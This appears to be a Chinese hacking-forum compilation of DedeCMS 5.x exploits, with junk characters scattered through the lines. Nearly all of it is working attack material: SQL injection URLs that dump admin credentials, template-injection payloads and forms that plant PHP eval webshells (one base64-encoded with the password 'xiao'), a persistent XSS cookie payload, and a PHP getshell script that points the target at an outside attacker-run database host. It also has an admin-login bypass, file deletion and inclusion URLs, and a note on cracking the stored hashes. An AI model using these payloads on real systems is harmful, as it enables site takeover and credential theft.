|
|
5 z8 y6 b$ c, O& K% J! iDedecms 5.6 rss注入漏洞$ ~4 W/ s2 o7 _. F- ?* R: i0 ?
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
& y3 q% _+ Y+ l+ ?' j
" z3 ~; U( R b# k% @4 X! |* Q( o& |2 e4 U0 |/ f; c
5 p) G. B ^0 n3 N: n6 Z
5 O7 _( Y, R4 W* x5 _: ?8 H9 h* l. r9 ^) c3 h/ |
8 v' \. K! [/ Y" V
4 F) n; C9 z8 T" B( {0 F/ Y
- Y# ] D0 g6 \3 o( a" \& LDedeCms v5.6 嵌入恶意代码执行漏洞
8 o4 v% u* \5 s, R6 j8 F. S. y/ ?注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
5 j$ M) X7 G# l v# W! F发表后查看或修改即可执行
6 l9 p+ A2 F6 X6 u8 z9 S) B; Ga{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}" t7 Y3 k! p0 B4 |4 D# u3 @
生成x.php 密码xiao,直接生成一句话。( p' w+ i' ~" |
' e* G S, N, w. r1 Y
+ v! m; p* @: X1 @ b* k- \. g& N& P" U3 W6 P4 V- w
& I+ l1 E' M5 K' |1 f" p- P, |9 e" k9 ^* n( L4 z' w2 A! Z3 X
: _, `- G5 O" n) ]3 q8 P% N
8 `% a4 n5 C' |( j6 F0 T0 g; |
& C; y3 V" N( Z4 Z5 t5 W7 c) E) Y
Dede 5.6 GBK SQL注入漏洞' g& i' F$ D% ^5 N8 `7 G
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';0 }. {; J$ l3 ]& l* |: |; G8 U
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe' N$ _* i) G. {
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
9 M' e+ P1 C1 E g8 g! v7 s* z3 i: a
8 p& O4 O) r; \% Z' C! y4 W# x9 I1 Y+ S) B9 D% d% C6 P/ m! _6 h
7 o8 S" f4 j5 e$ ]
9 \) A8 z% D& X7 ~0 Z$ ]- d; p' [. Q3 T8 p: V: e0 z
4 {4 m% b* K8 _" l5 s, s( d9 U( A2 e5 r# }+ J
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞+ u A$ X* R4 _
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` , Q" ?0 }# ^, i. U
- V2 W8 R& c7 |. n+ K
/ v8 J" Y5 X1 A% g7 k/ g6 L( p M" v0 g, Y* c1 `( C
6 b, @9 {" E! h. m& I7 n* r
" @9 U) \2 S$ J, b
$ H5 ?/ a( Y8 ^: T+ G5 r* P; ]- [DEDECMS 全版本 gotopage变量XSS漏洞3 R6 s+ z0 e% M2 n- {3 ^
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 4 m, m6 @! m$ h/ o N, l
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
5 O' E1 l" `7 R# y4 n# j* Z7 u" D0 f9 P+ Z9 _7 ^
. m5 }& ~; x# S1 R- }/ H
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 + f# P+ }! q) a; o1 F5 ^
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
2 f$ U4 C+ ~2 E5 r2 d, T0 X, e( T% [% s- B1 \0 Y5 x5 A, X# J" d
4 i6 W \2 |! y- P9 h% O2 X* |' O6 a7 Jhttp://v57.demo.dedecms.com/dede/login.php$ Q/ l( W: A1 K- G% `6 k5 b9 n; `5 N
2 ^4 h6 o: W+ S1 x8 |) s5 O1 l$ X5 N8 ?5 o1 E0 M
color=Red]DeDeCMS(织梦)变量覆盖getshell
& s6 I" _8 `/ t) }+ `# v0 T7 J" u0 u#!usr/bin/php -w
2 Z; f( }& B3 z, `8 X: q. F<?php' f" h# P6 g$ e4 S% I1 L
error_reporting(E_ERROR);$ s2 q. x( A4 _5 [% Q
set_time_limit(0);7 E/ N0 `: e! H" E3 r
print_r('
3 }4 W$ d. J& uDEDEcms Variable Coverage
7 s% e6 ]' K) i" [: M9 c$ l2 d- oExploit Author: www.heixiaozi.comwww.webvul.com+ E1 K: L E! I2 i6 x) G$ P1 x
);
8 j. w3 M$ ~' P8 \2 J5 N4 Uecho "\r\n";4 f. {0 R. v. U4 y
if($argv[2]==null){
! q0 {; J/ O5 e; J p# yprint_r('
% x8 `6 d K# A1 U+---------------------------------------------------------------------------+
& B0 x) ?) q; I/ SUsage: php '.$argv[0].' url aid path8 G" S1 O% X! m1 J: W$ M
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
: G2 e. d! I$ ~5 I, P. s% fExample:
" v0 |6 S5 P( n" }9 n' uphp '.$argv[0].' www.site.com 1 old" k2 C: u) g1 `- p
+---------------------------------------------------------------------------+) o' T7 E0 w' K. g9 J2 e5 Q
'); Q9 Z# j( q# n; y
exit;' b: W( v, U3 X' W
}
4 s5 C4 |1 z0 N( V+ e$url=$argv[1];
9 s1 W1 m" q1 ]" `" R$aid=$argv[2];
, h2 Z3 H1 g0 J& V8 W; d5 P) b4 a* R. U$path=$argv[3];9 ?6 J8 n7 _7 P, [
$exp=Getshell($url,$aid,$path);* a3 _1 z$ d* A1 m% Z& M2 s
if (strpos($exp,"OK")>12){2 d! q, r$ M, ` t! k9 [
echo "% v+ F1 a( i+ L8 J! c9 ]' T0 _
Exploit Success \n";
; H% C( w( d* J* y. Bif($aid==1)echo "
& v0 T0 p0 _# s$ d8 X: ]: l7 hShell:".$url."/$path/data/cache/fuck.php\n" ;. M" }, ~) c, N! b
) s( y( r1 `& E k' Q7 x
& n: P" f& R6 }4 k% l I7 `if($aid==2)echo ". [" [) k' j- h a
Shell:".$url."/$path/fuck.php\n" ;
4 r0 u* B* f" `( v% v* A$ {6 S3 D! t% A
! Q" F: @* ^5 d1 ]' h2 z* z+ O( U' M. q
if($aid==3)echo "
+ t$ r7 _) K. Q8 K) s( V: O/ iShell:".$url."/$path/plus/fuck.php\n"; t" v' A6 V2 W$ G s$ p
7 F& ^( n4 \7 [; b
: I0 k( W! u$ } ]; H$ U& M}else{ S( ? q8 |# a! L+ D9 M
echo "8 {/ f( o1 ~9 r" a! z
Exploit Failed \n";' J* `8 o. C" t* m+ }
}
; G t- c D& B* dfunction Getshell($url,$aid,$path){
! y2 ~1 f& l7 H5 z) p$id=$aid;( y0 O" C& ?8 C1 h/ M: v! H/ w( ?
$host=$url;
8 `4 d# W8 H4 }- g) ^3 s$port="80";
: }9 V% B. O) F0 S3 m) {+ O$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";. k. S( w3 \8 o1 ?# X" U$ o9 E
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";5 {7 w2 d0 r4 o9 D! X: h
$data .= "Host: ".$host."\r\n";
* G, V3 ?; M( p; i, c& G$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";: g( u$ s1 n4 n3 t# Q1 ]
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
N; C) J$ X' N$ {# G, p$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
$ b! ]4 |2 j- C6 W/ B0 {3 C2 w: d6 w//$data .= "Accept-Encoding: gzip,deflate\r\n";9 {- u1 O: a3 `& S( _# e
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
. j6 U B; D+ \5 i' }( l* q$data .= "Connection: keep-alive\r\n";
0 Q% [8 C4 X4 f X5 p+ r$data .= "Content-Type: application/x-www-form-urlencoded\r\n";! D; a$ K5 [/ X6 D6 \
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";$ ^( M( d! I9 H8 r
$data .= $content."\r\n";
/ Z' {1 Y$ \2 j$ N" p$ock=fsockopen($host,$port);" j$ e" w$ o, W
if (!$ock) {* ^" d7 P& E- w9 C/ f
echo "
" T8 p6 J+ y$ @" Y+ tNo response from ".$host."\n";
- c' s% | C8 _, e}( @( L( e; Q; |- L+ Q7 c
fwrite($ock,$data);
; p; H5 V4 \* b4 Kwhile (!feof($ock)) {' Y! b- C ~) o) k
$exp=fgets($ock, 1024);
5 l) g1 ]$ o7 Z; |return $exp;) h8 C8 @1 ]7 [, y# |
}
$ S' }$ d9 H0 X- @! z5 E) S}
/ U8 f3 ]4 A$ r6 @5 _. u# a6 [& U) L& G! B" k' y
" }: A* B( v) k. R
?>
" M; i& | `! f4 ]; l4 u& O- X4 O+ O3 t' _! Q( s/ D3 t
& Y2 r9 e# H$ _- [& e [$ D$ q, j6 l# C7 r
) y0 u1 a4 R- Y2 J8 \: }9 s' N- C: ]) B2 v
6 h! s8 W! I0 @6 g% S+ H' G7 y
% E8 p) P4 n. \- S1 s" {$ n2 O
+ z( Q5 C+ W/ b8 m r9 F) f
) ]! n- ?9 C. Q# w& h( {
/ i4 w% _& Z$ U7 X4 {6 Q# e+ lDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
& D T/ j6 }, \http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
0 W' ^/ L1 U3 w7 {* G+ V+ |2 C: S' V1 O% @
& H/ }% }9 W& N0 j: k- @) D, y3 S把上面validate=dcug改为当前的验证码,即可直接进入网站后台
; k8 X6 R7 p. K( R8 S. u5 u8 Z+ g0 Q1 t$ t' b6 t0 P5 N& d* K# `6 @5 t& p
: G- p7 R k+ ^7 _1 T此漏洞的前提是必须得到后台路径才能实现8 o0 C- r/ r! w. }6 f# i4 a
* J7 K+ e* q6 N$ Q7 _9 J& m! b- k( t8 z% s; C1 m
- `$ e# N/ d; T0 J
8 N' m: ]( m1 i i0 x+ D" B& t
$ w- E( v: o# d# S# Q: L8 j- n! W' B1 R+ i/ n
( M/ @( @. A1 z* ?8 l% e) Q
" v4 u% ?5 D* w4 W- [/ `; P( A. E! g( T5 U6 U2 G
# {! e/ t( C5 dDedecms织梦 标签远程文件写入漏洞
9 [6 C2 V+ \6 e前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
. n: n5 Y; P' e+ n K& N5 K2 ^* _7 V) a6 o
( T( K' r4 x5 B, r
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 9 P& n1 R7 Y5 G$ Y8 S
<form action="" method="post" name="QuickSearch" id="QuickSearch">
* v+ e/ n* U! ?+ X {( f<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />4 {$ _" h1 s. p# T# ~
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
|! | d$ Y% ^! m<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
* [) g& Y# g. ^7 u<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
B( `( h# o1 E. x4 G<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />5 x8 R0 g% Z3 C. w( B
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />5 F, m' A2 Q; |! H
<input type="text" value="true" name="nocache" style="width:400">
) \" }3 C8 h1 g$ w6 N4 F% v1 k" y% t<input type="submit" value="提交" name="QuickSearchBtn"><br />
8 [' `8 w# S9 c' R, |</form>" f# q5 e; [- p& a4 B) }
<script>7 q8 F9 L* m2 X2 ~+ I ?! o) e! |
function addaction()
4 L1 K/ R; ?! B6 ]6 ~) b- ~{& V9 w' u' H& R5 C4 z
document.QuickSearch.action=document.QuickSearch.doaction.value;1 t, k; b7 s6 J
}
$ G, M7 \ B f7 u* W( l( S</script>& E$ ?, _) D2 k+ S
) g+ u1 {; V7 G, ^4 d& l+ {7 r. c2 k r0 o2 i _4 n
5 k3 \( A9 u& U$ \ P3 q$ x1 s( Q& Y+ U: X5 v- Y
* C7 u6 [5 o+ f+ R, |1 _
?# y s; ^2 `' b B+ m2 U
- ]$ @$ o, l- z9 g) i
" ^, s6 }0 a% m3 d5 [( g) c* H
p: y0 p% O% y8 v, L3 K5 S# F
- o1 l9 X9 B" _+ g( q
DedeCms v5.6 嵌入恶意代码执行漏洞
# F! ^1 I- ` r( J% ?注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
3 |+ t5 P6 T/ c& Sa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}4 _. V( a6 Q _6 o
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得- Z* j: y- h. I# _
Dedecms <= V5.6 Final模板执行漏洞2 t8 W6 D5 I% c- Z* [5 {
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:! ~) e! x2 y# w
uploads/userup/2/12OMX04-15A.jpg
2 N! o0 z% J! d8 t, x$ t' r
2 w. Q4 B" A% H. R) S6 N
% O& a4 V# z( b模板内容是(如果限制图片格式,加gif89a):
9 U4 R5 o# G) c, r{dede:name runphp='yes'}; v$ U: j% Z0 i
$fp = @fopen("1.php", 'a');$ t/ g# _9 P' O* U9 g0 v2 M$ N
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
) c, Q- \/ W F/ ~# u! P- h@fclose($fp);7 E) T' I1 o& v* v2 o
{/dede:name}3 y: t6 @3 |- g, t _& O! Y" _4 F4 i
2 修改刚刚发表的文章,查看源文件,构造一个表单:
/ n1 ~+ }8 x5 e7 R: m' u4 e. ~<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">/ H8 y7 n$ w! P- @! Y
<input type="hidden" name="dopost" value="save" />% D9 J; c5 A( Z& p4 L9 X/ M
<input type="hidden" name="aid" value="2" />8 M# j; S5 N0 }* t3 y* y+ s
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
/ p3 T5 C3 R% o: u2 @<input type="hidden" name="channelid" value="1" />
' I# {9 J7 L' D<input type="hidden" name="oldlitpic" value="" />
* w4 S% A( C& Z- \( ] N% }<input type="hidden" name="sortrank" value="1275972263" />8 {! Z# k* l Y& Q: k/ E2 }0 L
/ l1 W9 j8 \. k1 }* S; {
/ B4 x e Q" i<div id="mainCp">+ p* s) `+ p7 J+ E. w) [5 d: [
<h3 class="meTitle"><strong>修改文章</strong></h3>9 Z5 m. n- G8 P9 ~8 W3 w5 U0 _1 F
4 Z- X# I i+ ]8 t
3 I8 h2 Q7 h: B5 ]<div class="postForm">" B1 T+ @' U* n y
<label>标题:</label>- H/ v3 h6 K ~( t
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
( V* F4 X6 X7 L1 W/ C" I1 W
0 ]# F C5 M! y+ t. c$ W; S6 ?2 C _2 a
<label>标签TAG:</label>1 R9 t* M& n0 r; o9 i
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
# K8 P) o f5 u
/ \! L/ c `+ M: B
- s" A* `1 D8 g" t0 i! Q& t% m( s<label>作者:</label>
5 c# O3 S7 p- u" z( _4 f w<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>& D7 K8 p; K0 [9 w
' w+ Y" L; \; P4 M* i& m( c
- r8 k$ V6 z/ ]+ s& F, c<label>隶属栏目:</label>& y% o: e5 F/ Q+ }3 u6 G* N( p0 _; M
<select name='typeid' size='1'>/ M3 J. w4 P8 g/ V
<option value='1' class='option3' selected=''>测试栏目</option> A: x* b6 Q: L6 c5 y t. E
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)" n: N: w- K+ w* L' ]7 Z- k
% e$ Y3 @5 @% \$ p G
# y; b2 n$ P" ?8 q9 s& a<label>我的分类:</label>) P$ Q; a, @# z3 y
<select name='mtypesid' size='1'>2 ]* o) [" P5 [- |6 r+ w; t
<option value='0' selected>请选择分类...</option>! C$ n! Z1 ?7 p5 R. h
<option value='1' class='option3' selected>hahahha</option>% s6 G- G7 u. \ c
</select>% F& q' g0 n- z. a; _
; w! T0 c& C W. o
$ S. k. e4 J% \5 A$ d) L8 ^/ D
<label>信息摘要:</label> p- x( Q! Y4 ]& B R. r+ m
<textarea name="description" id="description">1111111</textarea>
2 t5 O- l0 {- D( `(内容的简要说明)
4 H* g5 r: X& d* {7 w, j
$ P+ X. c, n/ B' K- k/ k
G" H+ O' b1 _% J) e4 F M<label>缩略图:</label>
, p* U+ k0 ?9 v9 X<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
' B- Q! s) {+ @) X$ C; ^% w) r/ p8 ^; R' _! s
- H+ q: W: u& d( v7 }0 y4 ^
<input type='text' name='templet'
8 ~2 r/ Z1 a" a+ W' ]# p; y; gvalue="../ uploads/userup/2/12OMX04-15A.jpg">2 L8 \& B1 f% F i& i& Y/ E% A* P
<input type='text' name='dede_addonfields'
6 ^5 O3 V* K, Jvalue="templet,htmltext;">(这里构造)7 a8 K( W1 N) z
</div>
) y8 m9 \, M" P5 [& V8 h+ x1 `1 v* B8 |; V
$ s8 `( a5 X6 e7 c' E! E @: ^
<!-- 表单操作区域 -->
; J) ~: j' r/ g4 x9 L2 y* S! p9 Y<h3 class="meTitle">详细内容</h3> X& @; y- F: j+ ^
$ V; e, T5 O" v& |
& v# k# K+ J; _- l, y2 O' m<div class="contentShow postForm">
- M1 V# W) W& a: Z2 z. y) ~$ @<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
& V( z# i9 m0 }4 n" H/ }2 O* Z: ^) A4 o8 H% E8 l: ]
+ u; p x& p' V1 ^" ]: y* w$ I
<label>验证码:</label>: d* M! _" Z: u3 I
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
. C4 s( t! W6 J" P( [<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />+ c1 {! U9 h9 ~! f3 W
, S( O" [" ?/ c1 R- _4 N+ j* k8 y: C/ f
<button class="button2" type="submit">提交</button>1 Q8 }! O7 ~1 y: q
<button class="button2 ml10" type="reset">重置</button>% y1 c. Z3 L$ i* M. i/ `
</div>5 w0 x6 j0 M2 ]7 r
' g: g* d4 w1 a ~9 k5 m) p
! _6 t- r O& \2 C/ T R3 |</div>
8 K$ Q4 E* P' l- g' E% E! W( J7 |" F1 T7 }
+ L9 C+ B- r1 | a# h
</form>* u" o( E" R% T( R9 H' Q2 ]
' f2 L% b+ D! [
1 S, b; e# o% ~& A6 C
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
& R8 B0 G, `$ F9 s( n, i3 r2 L假设刚刚修改的文章的aid为2,则我们只需要访问:8 g7 D6 d C1 j7 Z4 k( k1 F3 P
http://127.0.0.1/dede/plus/view.php?aid=2: _4 L$ x/ c6 V5 B8 b2 D1 F. e4 Q
即可以在plus目录下生成webshell:1.php
! G, r% j( ]. o9 ?6 e" p# k# ?& Y& E# C. g9 r8 S+ n
" ]4 K- J8 J1 p% F1 r) l0 `$ A5 m4 M; C: c7 b
4 _4 z4 U" p1 A* P
/ h- W6 _* a* I" [ G$ }6 o5 n. |4 k3 C, l6 ]1 G
, Q P9 D" k0 }/ C- P) r
0 j0 a1 ]& v2 g" J) H3 V0 G) K
& [+ y1 v @1 u
, x5 l- X4 S# z4 E) I- J. j D
: t1 V3 u2 O4 M; b, A
- k# j5 Z5 |# u" XDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)4 L$ E3 t: ?9 y" f/ d
Gif89a{dede:field name='toby57' runphp='yes'}
6 ]. K; R2 d x; `! c8 J+ ophpinfo();; t! y# s8 ~$ N- c+ S; p, z
{/dede:field}# o; M2 x) a% Q/ P
保存为1.gif7 p) d+ ~$ N; M! t
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
) ^, ^: L; }. b- c" f' K- h<input type="hidden" name="aid" value="7" />
, u2 j! O; k: R8 ^<input type="hidden" name="mediatype" value="1" /> 0 D! x6 S8 I. j" I
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> 5 F; z& m7 P1 q8 [) W2 M7 i& p2 j
<input type="hidden" name="dopost" value="save" />
' J3 T& p" f& V<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 8 S2 K' m7 X9 m1 W$ R' b( |% p
<input name="addonfile" type="file" id="addonfile"/>
# U. S+ N2 s) s! p- e2 n; l) f<button class="button2" type="submit" >更改</button>
' g4 Z" P/ }! I/ d</form>
! }" G3 ]9 s/ Z$ x. M2 H' u$ Q) c6 U: v4 q3 ]; y8 `
! e% b& ]. t- i0 b0 \构造如上表单,上传后图片保存为/uploads/userup/3/1.gif( c) I/ F0 r, k1 E" q% Y/ m
发表文章,然后构造修改表单如下:
3 S1 L+ A2 ~1 i9 ?6 Q7 F+ M1 \' U. J7 R+ h- P" }6 d7 L
Y$ N4 x* v; t% N% C# ^7 |
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> / A8 t2 i. q1 J# t/ N
<input type="hidden" name="dopost" value="save" />
5 E( s- `. T0 U0 ?) v: c<input type="hidden" name="aid" value="2" /> , v2 p: W" e5 y \$ l
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
1 n) p. a/ R6 G3 ~; m- O8 k<input type="hidden" name="channelid" value="1" /> * \, B# o6 [9 J; ~, x Z! W# X2 M B
<input type="hidden" name="oldlitpic" value="" /> : M, E6 F! u, r& ], ^: s" u
<input type="hidden" name="sortrank" value="1282049150" /> & j0 m/ j6 m; d' {
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
. l1 k7 `$ m0 D" ?4 z/ p4 l<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
4 r R8 \5 ~% J1 A, V<select name='typeid' size='1'> . {1 r, ?; l- Z1 |8 b
<option value='1' class='option3' selected=''>Test</option> ) c! t+ `; v. M7 e8 J& E0 H* `
<select name='mtypesid' size='1'> + u8 `3 F1 `& w% u9 j' @
<option value='0' selected>请选择分类...</option> 9 h2 M+ m/ w' }: V$ @: w3 b2 ~
<option value='1' class='option3' selected>aa</option></select> % H3 Q& O f1 A' X* H4 g+ ^
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 5 _1 j0 C5 c, f; E# o+ N
<input type='hidden' name='dede_addonfields' value="templet"> 8 g! e4 i9 X/ @
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> * `8 p$ R. h" y5 [ \" n
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 0 }# J- z0 f/ r4 K# M# i
<button class="button2" type="submit">提交</button> 3 W& Y" b/ T" Q/ e" E8 \1 o6 l5 @
</form>: a$ @' c! |, Y5 _# ^% f' b/ \
* x& y2 `% l. p: b6 I" W- h* f1 A0 I. [. D' b1 q3 Q. P9 s5 Y
9 X- z6 i2 m a8 h) h, r
j, ?( x" f# `7 X& F! |# K) ^- q. G0 S. R* B6 Z
9 k3 b& H4 P5 t5 a. @2 C* Q' M8 w/ X
5 e; U+ u* @4 ^/ _. w" _( H6 ~8 x0 P) E7 e) B( W: G9 s, m; g
+ ^* } }$ K$ m7 E3 J1 p
* @* ]/ g; C% I" s& C3 |$ g
0 X( H, f% E* R4 S, M4 f$ R2 _% T1 M8 `
织梦(Dedecms)V5.6 远程文件删除漏洞2 o/ c' X; V3 _" d+ U
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif- F$ P( c$ m9 u& S" s l
1 \+ i z! L& s! {+ a: ~5 B
/ E5 x& }" ^! C( R. k7 J. F* }' H/ x C
5 o/ G; x6 `2 O0 c H. a4 h5 B D0 r5 {0 _8 x5 |
: F$ {) w, W1 B6 V5 j O5 ?- v. G3 p! e, G% B5 ]
$ u! ?+ L! u, k( }0 k5 Q: F; c
$ _ x9 _/ C7 N& u) W
! L! t" _: v: j0 E织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
, S, h1 t" _, W" R# O% Y& ehttp://www.test.com/plus/carbuya ... urn&code=../../
* j/ B- M- ]* e- }( i2 S
# W+ b% k; @/ z5 `. K& q. A' e, G$ N" B* A! I7 w; X
' z _+ I) ]2 O5 j' E
; t. ?; o2 r: V# Z& p4 B4 E
/ i0 I8 @: I) ]# h" f3 @% m) w
4 b5 b: A) ~) a. v6 b. W& V3 ^' ?1 |0 A. S
7 M' x# D2 a: I4 i9 Q0 M
. }/ |+ s* }3 P* j& _: O& B6 t
0 ?. ^( s, f2 ^ [
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 $ }1 l9 o5 `6 x) r6 s% e
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
) u$ ^7 U: H4 O8 Y5 S$ p* i2 j密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD54 N. a/ ]0 v4 }, _2 H1 w( A8 Y
2 m; `! q, z/ B8 Q
7 T& ?1 }8 G5 u5 o
7 n1 \% E6 T& s/ C* y& x8 J% v' E9 Y7 v6 y0 R/ j
, G% V6 }* O, o
, Q! S7 N$ _$ g3 `
1 x, N- Y/ ?0 V$ @: o
$ p8 X6 w/ h7 {8 e$ b
6 B9 o2 |0 T- B5 m. [, h8 X
7 P, [4 ^- }; _织梦(Dedecms) 5.1 feedback_js.php 注入漏洞+ C# v, p- h0 m
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='/ b+ o& M% r' [7 r, ]" Y
R& z: l4 J( b! l. Q8 c
/ R# b1 T; s% Q2 K h$ L, z3 c" l) n Y$ P7 g
6 O4 m7 j, q- E% n
+ W E" R& ^) Q L/ v' @8 r# H/ g* k1 O- V) K; W+ d( f# X
9 P* n+ V6 `9 V$ X' l) v
